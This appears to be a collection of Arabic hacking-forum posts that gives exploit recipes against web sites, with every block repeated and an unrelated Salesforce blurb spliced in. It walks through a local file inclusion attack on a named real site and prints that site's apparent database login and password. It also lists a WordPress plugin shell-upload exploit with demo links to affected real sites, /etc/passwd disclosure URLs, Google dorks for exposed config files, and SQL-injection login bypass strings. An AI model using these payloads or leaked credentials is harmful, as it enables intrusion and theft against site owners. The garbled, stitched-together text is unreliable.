اولا لدينا الموقع المستهدف:http://theatrefoxcompagnie.com/index.php?page= هذا هو الموقع
نكتب هذا الكود بعد الرابط مباشرة
كود PHP: [عرض]
php://filter/convert.base64-encode/resource=index
طبعا هو ليس كود إنما فلتر المهم بعد هذا الكود يطلع لنا كلام بالانجليزي.!!!
الان ننسخ هذا الكلام و ننتقل لهذا الموقع لفك التشفير ... http://home.paulschou.net/tools/xlate/تمام
او بإمكانك فك التشفير عن طريق الشيل !!!
والمراد من فك التشفير هو الحصول على ملف الكونيفق
بعد فك التشفير نأخذ هذه الكلمة config_inc تمام
وننسخها ونحذف كلمة index في الكود السابق ونضع هذه الكلمة config_inc رائع يعني بصير الكود
كود PHP: [عرض]
php://filter/convert.base64-encode/resource=config_inc
الان نرى كلام انجليزي نقوم بنسخه و بفك تشفيره إما عبر الشيل او عبر الموقع حسب الرغبة
وبعد فك التشفير نجد المعلومات كالتالي
user:foxcompagnie
Password:b9waz95d
database:theatrefoxcompagniecom
#CS
بسم الله الرحمن الرحيم
اخواني الكرام
السلام عليكم و رحمة الله وبركاته
الموضوع عن ثغرات:Local File Include بظن أغلبكم بيعرفها
اولا لدينا الموقع المستهدف:http://theatrefoxcompagnie.com/index.php?page= هذا هو الموقع
نكتب هذا الكود بعد الرابط مباشرة
كود PHP: [عرض]
php://filter/convert.base64-encode/resource=index
طبعا هو ليس كود إنما فلتر المهم بعد هذا الكود يطلع لنا كلام بالانجليزي.!!!
الان ننسخ هذا الكلام و ننتقل لهذا الموقع لفك التشفير ... http://home.paulschou.net/tools/xlate/تمام
او بإمكانك فك التشفير عن طريق الشيل !!!
والمراد من فك التشفير هو الحصول على ملف الكونيفق
بعد فك التشفير نأخذ هذه الكلمة config_inc تمام
وننسخها ونحذف كلمة index في الكود السابق ونضع هذه الكلمة config_inc رائع يعني بصير الكود
كود PHP: [عرض]
php://filter/convert.base64-encode/resource=config_inc
الان نرى كلام انجليزي نقوم بنسخه و بفك تشفيره إما عبر الشيل او عبر الموقع حسب الرغبة
وبعد فك التشفير نجد المعلومات كالتالي
user:foxcompagnie
Password:b9waz95d
database:theatrefoxcompagniecom
#CS
##################################################
# Exploit Title: Wordpress woocommerce product options Upload Shell
# Google Dork :
# N/A
# Date: 16/05/2019
# Exploit Author: ArkealoGeNDz
# Tested on: Kali linux 2.0 / Mozilla Firefox
# Vulnerability : http://www.website.dz//woocommerce-product-options/includes/image-upload.php
# Use Burp Suite To Upload Shell
# Path Shell : /wp-content/plugins/woocommerce-product-options/uploads/numbers-letters/shell.php
# Path Shell 2 : /wp-content/uploads/2019/05/shell.php
##################################################
# Demo:
# https://www.pestamps.com/wp-content/plugins/woocommerce-product-options/uploads/3f59b09a5a/ArkealoGeNDz.png
# https://www.numerim.bzh/wp-content/plugins/woocommerce-product-options/uploads/92c7372df6/ArkealoGeNDz.png
# https://lvrparis.fr/wp-content/plugins/woocommerce-product-options/uploads/49dde56d2f/ArkealoGeNDz.png
# https://designmummy.com.au/wp-content/plugins/woocommerce-product-options/uploads/4a5eb89316/ArkealoGeNDz.png
#################################################
# Telegram: @ArkealoGeNDz
#################################################
# Exploit Title: Wordpress woocommerce product options Upload Shell
# Google Dork :
# N/A
# Date: 16/05/2019
# Exploit Author: ArkealoGeNDz
# Tested on: Kali linux 2.0 / Mozilla Firefox
# Vulnerability : http://www.website.dz//woocommerce-product-options/includes/image-upload.php
# Use Burp Suite To Upload Shell
# Path Shell : /wp-content/plugins/woocommerce-product-options/uploads/numbers-letters/shell.php
# Path Shell 2 : /wp-content/uploads/2019/05/shell.php
##################################################
# Demo:
# https://www.pestamps.com/wp-content/plugins/woocommerce-product-options/uploads/3f59b09a5a/ArkealoGeNDz.png
# https://www.numerim.bzh/wp-content/plugins/woocommerce-product-options/uploads/92c7372df6/ArkealoGeNDz.png
# https://lvrparis.fr/wp-content/plugins/woocommerce-product-options/uploads/49dde56d2f/ArkealoGeNDz.png
# https://designmummy.com.au/wp-content/plugins/woocommerce-product-options/uploads/4a5eb89316/ArkealoGeNDz.png
#################################################
# Telegram: @ArkealoGeNDz
#################################################
ثغرة wptf-image-gallery 1.0.3 - Remote File Download
الاستغلال
./wptf-image-gallery/lib-mbox/ajax_load.php
شرح
http://www.site.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
#CS
الاستغلال
./wptf-image-gallery/lib-mbox/ajax_load.php
شرح
http://www.site.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
#CS
Salesforce
Overview
Go digital fast and empower your teams to work from anywhere. Develop scalable, custom business apps with low-code development or give your teams the tools to build with services and APIs.
الثغرة
Local File Disclosure in wordpress theme Diarise
الدورك
inurl:"wp-content/themes/diarise/"
الاستغلال
http://site.com/wp-content/themes/diarise/download.php?calendar=[ file:///etc/passwd ]
#CS
Local File Disclosure in wordpress theme Diarise
الدورك
inurl:"wp-content/themes/diarise/"
الاستغلال
http://site.com/wp-content/themes/diarise/download.php?calendar=[ file:///etc/passwd ]
#CS
الدورك intext:"ISPROJEK"
بعدها العثور علي لوحه التحكم
راح يكون اليوزر و الباس تبعهم
user: ' or 1=1 limit 1 -- -+
password: ' or 1=1 limit 1 -- -+
الثاني
الدورك
filename:”wp-config.php” “define(‘DB_PASSWORD’,” extension:php
الدورك
inurl:"index.php?mnu=login"
الاستخدام
/ index.php?mnu=admin
الدورك
intext:"Powered by iyiWebSitesi"
الاستخدام
لوحه التحكم
testpage.com/admin
sql bypass
id : = ' /*!or*/1=1#
pass : = ' /*!or*/1=1#
#cs
بعدها العثور علي لوحه التحكم
راح يكون اليوزر و الباس تبعهم
user: ' or 1=1 limit 1 -- -+
password: ' or 1=1 limit 1 -- -+
الثاني
الدورك
filename:”wp-config.php” “define(‘DB_PASSWORD’,” extension:php
الدورك
inurl:"index.php?mnu=login"
الاستخدام
/ index.php?mnu=admin
الدورك
intext:"Powered by iyiWebSitesi"
الاستخدام
لوحه التحكم
testpage.com/admin
sql bypass
id : = ' /*!or*/1=1#
pass : = ' /*!or*/1=1#
#cs
ثغرة PHPMiniAdmin 1.9 Database Open No-Secure Exploit
الدورك
inurl:phpminiadmin.php
الاستغلال
https://site.com/salon/db/phpminiadmin.php
#CS
الدورك
inurl:phpminiadmin.php
الاستغلال
https://site.com/salon/db/phpminiadmin.php
#CS